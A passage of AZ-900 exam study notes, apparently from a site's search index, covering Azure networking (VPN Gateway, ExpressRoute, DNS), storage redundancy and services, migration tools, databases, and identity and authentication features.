                            Azure VPN Gateway instances are deployed in a dedicated subnet of the virtual network and enable the following connectivity: - Connect on-premises datacenters to virtual networks through a site-to-site connection. - Connect individual devices to virtual networks through a point-to-site connection. - Connect virtual networks to other virtual networks through a network-to-network connection.

                            When setting up a VPN gateway, you must specify the type of VPN - either policy-based or route-based:

                            • Policy-based VPN gateways specify statically the IP address of packets that should be encrypted through each tunnel. This type of device evaluates every data packet against those sets of IP addresses to choose the tunnel where that packet is going to be sent through.
                            • In Route-based gateways, IPSec tunnels are modeled as a network interface or virtual tunnel interface. IP routing (either static routes or dynamic routing protocols) decides which one of these tunnel interfaces to use when sending each packet. Route-based VPNs are the preferred connection method for on-premises devices. They're more resilient to topology changes such as the creation of new subnets.

                            Use a route-based VPN gateway if you need any of the following types of connectivity:

                            • Connections between virtual networks
                            • Point-to-site connections
                            • Multisite connections
                            • Coexistence with an Azure ExpressRoute gateway

                            There are a few ways to maximize the resiliency of your VPN gateway:

                            Active/standby: By default, VPN gateways are deployed as two instances in an active/standby configuration, even if you only see one VPN gateway resource in Azure. When planned maintenance or unplanned disruption affects the active instance, the standby instance automatically assumes responsibility for connections without any user intervention.

                            Active/active: With the introduction of support for the BGP routing protocol, you can also deploy VPN gateways in an active/active configuration. In this configuration, you assign a unique public IP address to each instance. You then create separate tunnels from the on-premises device to each IP address.

                            ExpressRoute failover: Another high-availability option is to configure a VPN gateway as a secure failover path for ExpressRoute connections. ExpressRoute circuits have resiliency built in. However, they aren't immune to physical problems that affect the cables delivering connectivity or outages that affect the complete ExpressRoute location.

                            Zone-redundant gateways: In regions that support availability zones, VPN gateways and ExpressRoute gateways can be deployed in a zone-redundant configuration. This configuration brings resiliency, scalability, and higher availability to virtual network gateways. These gateways require different gateway stock keeping units (SKUs) and use Standard public IP addresses instead of Basic public IP addresses.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#9-azure-expressroute","title":"9. Azure ExpressRoute","text":"

                            Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection, with the help of a connectivity provider. This connection is called an ExpressRoute Circuit. These connection between Microsoft cloud services (such as Microsoft Azure and Microsoft 365) and the offices, datacenters, or other facilities would require its own ExpressRoute circuit.

                            ExpressRoute connections don't go over the public Internet. ExpressRoute is a private connection from your on-premises infrastructure to your Azure infrastructure. Even if you have an ExpressRoute connection, DNS queries, certificate revocation list checking, and Azure Content Delivery Network requests are still sent over the public internet.

                            • Connectivity to Microsoft cloud services across all regions in the geopolitical region.
                            • Global connectivity to Microsoft services across all regions with the ExpressRoute Global Reach.
                            • Dynamic routing between your network and Microsoft via Border Gateway Protocol (BGP).
                            • Built-in redundancy in every peering location for higher reliability.

                            ExpressRoute enables direct access to the following services in all regions:

                            • Microsoft Office 365
                            • Microsoft Dynamics 365
                            • Azure compute services, such as Azure Virtual Machines
                            • Azure cloud services, such as Azure Cosmos DB and Azure Storage
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#features","title":"Features","text":"

                            Global connectivity: For example, say you had an office in Asia and a datacenter in Europe, both with ExpressRoute circuits connecting them to the Microsoft network. You could use ExpressRoute Global Reach to connect those two facilities, allowing them to communicate without transferring data over the public internet.

                            Dynamic routing: ExpressRoute uses the BGP. BGP is used to exchange routes between on-premises networks and resources running in Azure. This protocol enables dynamic routing between your on-premises network and services running in the Microsoft cloud.

                            Built-in redundancy: Each connectivity provider uses redundant devices to ensure that connections established with Microsoft are highly available. You can configure multiple circuits to complement this feature.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#expressroute-connectivity-models","title":"ExpressRoute connectivity models","text":"

                            ExpressRoute supports four models that you can use to connect your on-premises network to the Microsoft cloud:

                            Co-location at a cloud exchange: Your datacenter, office, or other facility is physically co-located at a cloud exchange, such as an ISP. In this case, you can request a virtual cross-connect to the Microsoft cloud.

                            Point-to-point Ethernet connection: Point-to-point ethernet connection refers to using a point-to-point connection to connect your facility to the Microsoft cloud.

                            Any-to-any networks: With any-to-any connectivity, you can integrate your wide area network (WAN) with Azure by providing connections to your offices and datacenters. Azure integrates with your WAN connection to provide a connection like you would have between your datacenter and any branch offices.

                            Directly from ExpressRoute sites: You can connect directly into the Microsoft's global network at a peering location strategically distributed across the world. ExpressRoute Direct provides dual 100 Gbps or 10-Gbps connectivity, which supports Active/Active connectivity at scale.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#10-azure-dns","title":"10. Azure DNS","text":"

                            Azure DNS is a hosting service for DNS domains that provides name resolution by using Microsoft Azure infrastructure. By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. Azure DNS can manage DNS records for your Azure services and provide DNS for your external resources as well. Applications that require automated DNS management can integrate with the service by using the REST API and SDKs.

                            Azure DNS is based on Azure Resource Manager, which provides features such as:

                            • Azure role-based access control (Azure RBAC) to control who has access to specific actions for your organization.
                            • Activity logs to monitor how a user in your organization modified a resource or to find an error when troubleshooting.
                            • Resource locking to lock a subscription, resource group, or resource. Locking prevents other users in your organization from accidentally deleting or modifying critical resources.

                            Azure DNS also supports private DNS domains. This feature allows you to use your own custom domain names in your private virtual networks, rather than being stuck with the Azure-provided names.

                            Azure DNS also supports alias record sets. You can use an alias record set to refer to an Azure resource, such as an Azure public IP address, an Azure Traffic Manager profile, or an Azure Content Delivery Network (CDN) endpoint.

                            You can't use Azure DNS to buy a domain name. For an annual fee, you can buy a domain name by using App Service domains or a third-party domain name registrar. Once purchased, your domains can be hosted in Azure DNS for record management.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services","title":"Azure Storage Services","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#intro","title":"Intro","text":"

                            A storage account provides a unique namespace for your Azure Storage data that's accessible from anywhere in the world over HTTP or HTTPS. Data in this account is secure, highly available, durable, and massively scalable. When you create your storage account, you\u2019ll start by picking the storage account type. The type of account determines the storage services and redundancy options and has an impact on the use cases.

                            Type Supported services Redundancy Options Usage Standard general-purpose v2 Blob Storage (including Data Lake Storage), Queue Storage, Table Storage, and Azure Files LRS, GRS, RA-GRS, ZRS, GZRS, RA-GZRS Standard storage account type for blobs, file shares, queues, and tables. Recommended for most scenarios using Azure Storage. If you want support for network file system (NFS) in Azure Files, use the premium file shares account type. Premium block blobs Blob Storage (including Data Lake Storage) LRS, ZRS Premium storage account type for block blobs and append blobs. Recommended for scenarios with high transaction rates or that use smaller objects or require consistently low storage latency. Premium file shares Azure Files LRS, ZRS Premium storage account type for file shares only. Recommended for enterprise or high-performance scale applications. Use this account type if you want a storage account that supports both Server Message Block (SMB) and NFS file shares. Premium page blobs Page blobs only LRS Premium storage account type for page blobs only.

                            Some acronyms here:

                            • Locally redundant storage (LRS)
                            • Geo-redundant storage (GRS)
                            • Read-access geo-redundant storage (RA-GRS)
                            • Zone-redundant storage (ZRS)
                            • Geo-zone-redundant storage (GZRS)
                            • Read-access geo-zone-redundant storage (RA-GZRS)

                            Storage account endpoints:

                            The following table shows the endpoint format for Azure Storage services.

                            Storage service Endpoint Blob Storage https://\\<storage-account-name>.blob.core.windows.net Data Lake Storage Gen2 https://\\<storage-account-name>.dfs.core.windows.net Azure Files https://\\<storage-account-name>.file.core.windows.net Queue Storage https://\\<storage-account-name>.queue.core.windows.net Table Storage https://\\<storage-account-name>.table.core.windows.net

                            Other data for the exam:

                            • Maximum capacity for storage accounts: 5 PB.
                            • Number of storage accounts per region per suscription: 250.
                            • Maximum number of virtual network rules and IP network rules allowed per storage account in Azure: 200
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-redundancy","title":"Azure storage redundancy","text":"

                            Data in an Azure Storage account is always replicated three times in the primary region. Azure Storage offers two options for how your data is replicated in the primary region, locally redundant storage (LRS) and zone-redundant storage (ZRS).

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-primary-region","title":"Redundancy in the primary region","text":"

                            Locally redundant storage (LRS)

                            Locally redundant storage (LRS) replicates your data three times within a single data center in the primary region. LRS provides at least 11 nines of durability (99.999999999%) of objects over a given year. LRS is the lowest-cost redundancy option and offers the least durability compared to other options. LRS protects your data against server rack and drive failures. However, if a disaster such as fire or flooding occurs within the data center, all replicas of a storage account using LRS may be lost or unrecoverable. To mitigate this risk, Microsoft recommends using zone-redundant storage (ZRS), geo-redundant storage (GRS), or geo-zone-redundant storage (GZRS).

                            Zone-redundant storage (ZRS)

                            For Availability Zone-enabled Regions, zone-redundant storage (ZRS) replicates your Azure Storage data synchronously across three Azure availability zones in the primary region. ZRS offers durability for Azure Storage data objects of at least 12 nines (99.9999999999%) over a given year. With ZRS, your data is still accessible for both read and write operations even if a zone becomes unavailable. Microsoft recommends using ZRS in the primary region for scenarios that require high availability. ZRS is also recommended for restricting replication of data within a country or region to meet data governance requirements.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-secondary-region","title":"Redundancy in the secondary region","text":"

                            For applications requiring high durability, you can choose to additionally copy the data in your storage account to a secondary region that is hundreds of miles away from the primary region. If the data in your storage account is copied to a secondary region, then your data is durable even in the event of a catastrophic failure that prevents the data in the primary region from being recovered. When you create a storage account, you select the primary region for the account. The paired secondary region is based on Azure Region Pairs, and can't be changed.

                            By default, data in the secondary region isn't available for read or write access unless there's a failover to the secondary region. If the primary region becomes unavailable, you can choose to fail over to the secondary region. After the failover has completed, the secondary region becomes the primary region, and you can again read and write data.

                            Because data is replicated to the secondary region asynchronously, a failure that affects the primary region may result in data loss if the primary region can't be recovered. The interval between the most recent writes to the primary region and the last write to the secondary region is known as the recovery point objective (RPO). The RPO indicates the point in time to which data can be recovered. Azure Storage typically has an RPO of less than 15 minutes, although there's currently no SLA on how long it takes to replicate data to the secondary region.

                            Azure Storage offers two options for copying your data to a secondary region: geo-redundant storage (GRS) and geo-zone-redundant storage (GZRS). GRS is similar to running LRS in two regions, and GZRS is similar to running ZRS in the primary region and LRS in the secondary region.

                            Geo-redundant storage (GRS)

                            GRS copies your data synchronously three times within a single physical location in the primary region using LRS. It then copies your data asynchronously to a single physical location in the secondary region (the region pair) using LRS. GRS offers durability for Azure Storage data objects of at least 16 nines (99.99999999999999%) over a given year.

                            Geo-zone-redundant storage (GZRS)

                            GZRS combines the high availability provided by redundancy across availability zones with protection from regional outages provided by geo-replication. Data in a GZRS storage account is copied across three Azure availability zones in the primary region (similar to ZRS) and is also replicated to a secondary geographic region, using LRS, for protection from regional disasters. Microsoft recommends using GZRS for applications requiring maximum consistency, durability, and availability, excellent performance, and resilience for disaster recovery. GZRS is designed to provide at least 16 nines (99.99999999999999%) of durability of objects over a given year.

                            Read access to data in the secondary region (RA-GRS)

                            Geo-redundant storage (with GRS or GZRS) replicates your data to another physical location in the secondary region to protect against regional outages. However, that data is available to be read only if the customer or Microsoft initiates a failover from the primary to secondary region. However, if you enable read access to the secondary region, your data is always available, even when the primary region is running optimally. For read access to the secondary region, enable read-access geo-redundant storage (RA-GRS) or read-access geo-zone-redundant storage (RA-GZRS). Remember that the data in your secondary region may not be up-to-date due to RPO.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services_1","title":"Azure storage services","text":"
                              1. Azure Blobs: A massively scalable object store for text and binary data. Also includes support for big data analytics through Data Lake Storage Gen2.
                              1. Azure Files: Managed file shares for cloud or on-premises deployments.
                              1. Azure Queues: A messaging store for reliable messaging between application components.
                              1. Azure Disks: Block-level storage volumes for Azure VMs.
                              1. Azure Tables:\u00a0NoSQL table option for structured, non-relational data.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-blobs","title":"Azure Blobs","text":"

                            To store massive amounts of data, such as text or binary data. Azure Blob storage is unstructured, meaning that there are no restrictions on the kinds of data it can hold. Blob storage is ideal for:

                            • Serving images or documents directly to a browser.
                            • Storing files for distributed access.
                            • Streaming video and audio.
                            • Storing data for backup and restore, disaster recovery, and archiving.
                            • Storing data for analysis by an on-premises or Azure-hosted service.

                            Objects in blob storage can be accessed from anywhere in the world via HTTP or HTTPS. Users or client applications can access blobs via URLs, the Azure Storage REST API, Azure PowerShell, Azure CLI, or an Azure Storage client library.

                            Azure Storage offers different access tiers for your blob storage:

                            • Hot access tier: Optimized for storing data that is accessed frequently (for example, images for your website).
                            • Cool access tier: Optimized for data that is infrequently accessed and stored for at least 30 days (for example, invoices for your customers).
                            • Cold access tier: Optimized for storing data that is infrequently accessed and stored for at least 90 days.
                            • Archive access tier: Appropriate for data that is rarely accessed and stored for at least 180 days, with flexible latency requirements (for example, long-term backups).

                            Some considerations:

                            • Hot, cool, and cold access tiers can be set at the account level. The archive access tier isn't available at the account level.
                            • Hot, cool, cold, and archive tiers can be set at the blob level, during or after upload.
                            • Data in the cool and cold access tiers can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. For cool and cold data, a lower availability service-level agreement (SLA) and higher access costs compared to hot data are acceptable trade-offs for lower storage costs.
                            • Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-files","title":"Azure Files","text":"

                            Azure File storage offers fully managed file shares in the cloud that are accessible via the industry standard Server Message Block (SMB) or Network File System (NFS) protocols. Azure Files file shares can be mounted concurrently by cloud or on-premises deployments. SMB Azure file shares are accessible from Windows, Linux, and macOS clients. NFS Azure Files shares are accessible from Linux or macOS clients.

                            PowerShell cmdlets and Azure CLI can be used to create, mount, and manage Azure file shares as part of the administration of Azure applications. You can create and manage Azure file shares using Azure portal and Azure Storage Explorer.

                            Applications running in Azure can access data in the share via file system I/O APIs. \u00a0In addition to System IO APIs, you can use Azure Storage Client Libraries or the Azure Storage REST API.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-queues","title":"Azure Queues","text":"

                            Azure Queue storage is a service for storing large numbers of messages. Once stored, you can access the messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue can contain as many messages as your storage account has room for (potentially millions). Each individual message can be up to 64 KB in size. Queues are commonly used to create a backlog of work to process asynchronously.

                            Queue storage can be combined with compute functions like Azure Functions to take an action when a message is received.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-disks","title":"Azure Disks","text":"

                            Azure Disk storage, or Azure managed disks, are block-level storage volumes managed by Azure for use with Azure VMs. Conceptually, they\u2019re the same as a physical disk, but they\u2019re virtualized \u2013 offering greater resiliency and availability than a physical disk.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-tables","title":"Azure Tables","text":"

                            Azure Table storage stores large amounts of structured data. Azure tables are a NoSQL datastore that accepts authenticated calls from inside and outside the Azure cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-migration-options","title":"Azure data migration options","text":"

                            Azure Migrate is a service that helps you migrate from an on-premises environment to the cloud: - Unified migration platform: A single portal to start, run, and track your migration to Azure. - Range of tools: Azure Migrate also integrates with other Azure services and tools, and with independent software vendor (ISV) offerings. - Assessment and migration: In the Azure Migrate hub, you can assess and migrate your on-premises infrastructure to Azure.

                            Tools to help with migration:

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-discovery-and-assessment","title":"Azure Migrate: Discovery and assessment","text":"

                            Discover and assess on-premises servers running on VMware, Hyper-V, and physical servers in preparation for migration to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-server-migration","title":"Azure Migrate: Server Migration","text":"

                            Migrate VMware VMs, Hyper-V VMs, physical servers, other virtualized servers, and public cloud VMs to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#data-migration-assistant","title":"Data Migration Assistant","text":"

                            Data Migration Assistant is a stand-alone tool to assess SQL Servers. It helps pinpoint potential problems blocking migration. It identifies unsupported features, new features that can benefit you after migration, and the right path for database migration.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service","title":"Azure Database Migration Service","text":"

                            Migrate on-premises databases to Azure VMs running SQL Server, Azure SQL Database, or SQL Managed Instances.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-app-service-migration-assistant","title":"Azure App Service migration assistant","text":"

                            Azure App Service migration assistant is a standalone tool to assess on-premises websites for migration to Azure App Service. Use Migration Assistant to migrate .NET and PHP web apps to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-box","title":"Azure Data Box","text":"

                            Azure Data Box is a physical migration service that helps transfer large amounts of data in a quick, inexpensive, and reliable way. The secure data transfer is accelerated by shipping you a proprietary Data Box storage device that has a maximum usable storage capacity of 80 terabytes. The Data Box is transported to and from your datacenter via a regional carrier. A rugged case protects and secures the Data Box from damage during transit. You can order the Data Box device via the Azure portal to import or export data from Azure. Data Box is ideally suited to transfer data sizes larger than 40 TBs in scenarios with no to limited network connectivity.

                            Use cases for importing data: - Onetime migration - when a large amount of on-premises data is moved to Azure. - Moving a media library from offline tapes into Azure to create an online media library. - Migrating your VM farm, SQL server, and applications to Azure. - Moving historical data to Azure for in-depth analysis and reporting using HDInsight. - Initial bulk transfer - when an initial bulk transfer is done using Data Box (seed) followed by incremental transfers over the network. - Periodic uploads - when large amount of data is generated periodically and needs to be moved to Azure.

                            Use cases for exporting data: - Disaster recovery - when a copy of the data from Azure is restored to an on-premises network. - Security requirements - when you need to be able to export data out of Azure due to government or security requirements. - Migrate back to on-premises or to another cloud service provider - when you want to move all the data back to on-premises, or to another cloud service provider, export data via Data Box to migrate the workloads.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azcopy","title":"AzCopy","text":"

                            In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

                            AzCopy is a command-line utility that you can use to copy blobs or files to or from your storage account. Synchronizing blobs or files with AzCopy is one-direction synchronization. When you synchronize, you designated the source and destination, and AzCopy will copy files or blobs in that direction. It doesn't synchronize bi-directionally based on timestamps or other metadata.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-explorer","title":"Azure Storage Explorer","text":"

                            In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

                            Azure Storage Explorer is a standalone app that provides a graphical interface to manage files and blobs in your Azure Storage Account. It works on Windows, macOS, and Linux operating systems and uses AzCopy on the backend to perform all of the file and blob management tasks.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-file-sync","title":"Azure File Sync","text":"

                            In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

                            Azure File Sync is a tool that lets you centralize your file shares in Azure Files and keep the flexibility, performance, and compatibility of a Windows file server.

                            With Azure File Sync, you can:

                            • Use any protocol that's available on Windows Server to access your data locally, including SMB, NFS, and FTPS.
                            • Have as many caches as you need across the world.
                            • Replace a failed local server by installing Azure File Sync on a new server in the same datacenter.
                            • Configure cloud tiering so the most frequently accessed files are replicated locally, while infrequently accessed files are kept in the cloud until requested.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-services","title":"Azure Data Services","text":"

                            Key databases in Azure: Azure Cosmos DB, Azure SQL Database, and Azure Database Migration Service.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cosmos-db","title":"Cosmos DB","text":"

                            Azure Cosmos DB is a multimodel database service that enables to scale data out to multiple Azure regions across the world. This enables us to build applications available at a global scale

                            Fast, distributed NoSQL and relational database at any scale (additionally it supports SQL for querying data stored in Cosmos). Ideal for developing high-performance applications of any size or scale with a fully managed and serverless distributed database supporting open-source PostgreSQL, MongoDB, and Apache Cassandra as well as Java, Node.JS, Python, and .NET.

                            Use case: As an example, Cosmos DB provides a highly scalable solution to build and query graph-based data solutions.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sql-database","title":"Azure SQL Database","text":"

                            Azure SQL Database is a PaaS offering in which Microsoft hosts the SQL platform and manages maintenance like upgrades and patching, monitoring, and all activities to assure a 99.99% uptime.

                            Additionally, it's a relational database as a service (DaaS) based on the latest stable version of the Microsoft SQL Server database engine.

                            Use case: Flexible, fast, and elastic SQL database for your new apps. Build apps that scale with a fully managed and intelligent SQL database built for the cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service_1","title":"Azure Database Migration Service","text":"

                            It's a fully-managed service designed to enable seamless migrations from multiple database sources to Azure data platforms with minimal downtime.

                            It uses the Microsoft Data Migration Assistant to generate assessment reports previous to a migration.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#sql-database-elastic-pools","title":"SQL Database elastic pools","text":"

                            Just like Azure VM\u00a0Scale Sets are used with VMs, you can use\u00a0Elastic Pools\u00a0with Azure SQL\u00a0Databases!

                            SQL Database elastic pools\u00a0are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#other-database-services-postgresql-mariadb-mysql-redis-cache","title":"Other database services: PostgreSQL, MariaDB, MySQL, Redis Cache","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-postgresql","title":"Azure Database for PostgreSQL","text":"

                            Fully managed, intelligent, and scalable PostgreSQL database.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mysql","title":"Azure Database for MySQL","text":"

                            Scalable, open-source MySQL database

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mariadb","title":"Azure Database for MariaDB","text":"

                            Fully managed, community MariaDB

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cache-for-redis","title":"Azure Cache for Redis","text":"

                            Distributed, in-memory, scalable caching

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-identity-access-and-security","title":"Azure identity, access, and security","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-directory-services","title":"Azure directory services","text":"

                            When you secure identities on-premises with Active Directory, Microsoft doesn't monitor sign-in attempts. When you connect Active Directory with Azure AD, Microsoft can help protect you by detecting suspicious sign-in attempts at no extra cost.

                            Azure AD provides services such as: - Authentication: This includes verifying identity to access applications and resources. It also includes providing functionality such as self-service password reset, multifactor authentication, a custom list of banned passwords, and smart lockout services. - Single sign-on: Single sign-on (SSO) enables you to remember only one username and one password to access multiple applications. A single identity is tied to a user, which simplifies the security model. As users change roles or leave an organization, access modifications are tied to that identity, which greatly reduces the effort needed to change or disable accounts. - Application management: You can manage your cloud and on-premises apps by using Azure AD. Features like Application Proxy, SaaS apps, the My Apps portal, and single sign-on provide a better user experience. - Device management: Along with accounts for individual people, Azure AD supports the registration of devices. Registration enables devices to be managed through tools like Microsoft Intune. It also allows for device-based Conditional Access policies to restrict access attempts to only those coming from known devices, regardless of the requesting user account.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-connect","title":"Azure AD Connect","text":"

                            If you had an on-premises environment running Active Directory and a cloud deployment using Azure AD, you would need to maintain two identity sets. However, you can connect Active Directory with Azure AD, enabling a consistent identity experience between cloud and on-premises.

                            One method of connecting Azure AD with your on-premises AD is using Azure AD Connect. Azure AD Connect synchronizes user identities between on-premises Active Directory and Azure AD. Azure AD Connect synchronizes changes between both identity systems, so you can use features like SSO, multifactor authentication, and self-service password reset under both systems.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-active-directory-domain-services-azure-ad-ds","title":"Azure Active Directory Domain Services (Azure AD DS)","text":"

                            Azure Active Directory Domain Services (Azure AD DS) is a service that provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/NTLM authentication. Just like Azure AD lets you use directory services without having to maintain the infrastructure supporting it, with Azure AD DS, you get the benefit of domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign into services and applications connected to the managed domain using their existing credentials.

                            How does Azure AD DS work? When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name. Two Windows Server domain controllers are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

                            A managed domain is configured to perform a one-way synchronization from Azure AD to Azure AD DS. You can create resources directly in the managed domain, but they aren't synchronized back to Azure AD.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-authentication-services","title":"Azure authentication services","text":"

                            Authentication is the process of establishing the identity of a person, service, or device. Azure supports multiple authentication methods, including standard passwords, single sign-on (SSO), multifactor authentication (MFA), and passwordless.

                            Single sign-on (SSO) enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. Single sign-on is only as secure as the initial authenticator because the subsequent connections are all based on the security of the initial authenticator.

                            Multifactor authentication (MFA) is the process of prompting a user for an extra form (or factor) of identification during the sign-in process. These factors fall into three categories:

                            • Something the user knows \u2013 this might be a challenge #### Question.
                            • Something the user has \u2013 this might be a code that's sent to the user's mobile phone.
                            • Something the user is \u2013 this is typically some sort of biometric property, such as a fingerprint or face scan.

                            Passwordless authentication methods are more convenient because the password is removed and replaced with something you have, plus something you are, or something you know. Passwordless authentication needs to be set up on a device before it can work.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-multi-factor-authentication","title":"Azure AD Multi-Factor Authentication","text":"

                            Azure AD Multi-Factor Authentication is a Microsoft service that provides multifactor authentication capabilities. Azure AD Multi-Factor Authentication enables users to choose an additional form of authentication during sign-in, such as a phone call or mobile app notification.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#windows-hello-for-business","title":"Windows Hello for Business","text":"

                            Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

                            Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-authenticator-app","title":"Microsoft Authenticator App","text":"

                            Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

                            The Authenticator App turns any iOS or Android phone into a strong, passwordless credential. Users can sign-in to any platform or browser by getting a notification to their phone, matching a number displayed on the screen to the one on their phone, and then using their biometric (touch or face) or PIN to confirm.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#fido2-security-keys","title":"FIDO2 security keys","text":"

                            Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer this passwordless authentication service that integrate with Azure Active Directory (Azure AD).

                            Fast Identity Online (FIDO) is an open standard for passwordless authentication. FIDO allows users and organizations to leverage the standard to sign-in to their resources without a username or password by using an external security key or a platform key built into a device. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices, but could also use Bluetooth or NFC. With a hardware device that handles the authentication, the security of an account is increased as there's no password that could be exposed or guessed.

                            The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-external-identities","title":"Azure AD external identities","text":"

                            Azure AD External Identities refers to all the ways you can securely interact with users outside of your organization.

                            • Business to business (B2B) collaboration\u00a0- Collaborate with external users by letting them use their preferred identity to sign-in to your Microsoft applications or other enterprise applications (SaaS apps, custom-developed apps, etc.). B2B collaboration users are represented in your directory, typically as guest users.
                            • B2B direct connect\u00a0- Establish a mutual, two-way trust with another Azure AD organization for seamless collaboration. B2B direct connect currently supports Teams shared channels, enabling external users to access your resources from within their home instances of Teams. B2B direct connect users aren't represented in your directory, but they're visible from within the Teams shared channel and can be monitored in Teams admin center reports.
                            • Azure AD business to customer (B2C)\u00a0- Publish modern SaaS apps or custom-developed apps (excluding Microsoft apps) to consumers and customers, while using Azure AD B2C for identity and access management.

                            Depending on how you want to interact with external organizations and the types of resources you need to share, you can use a combination of these capabilities.

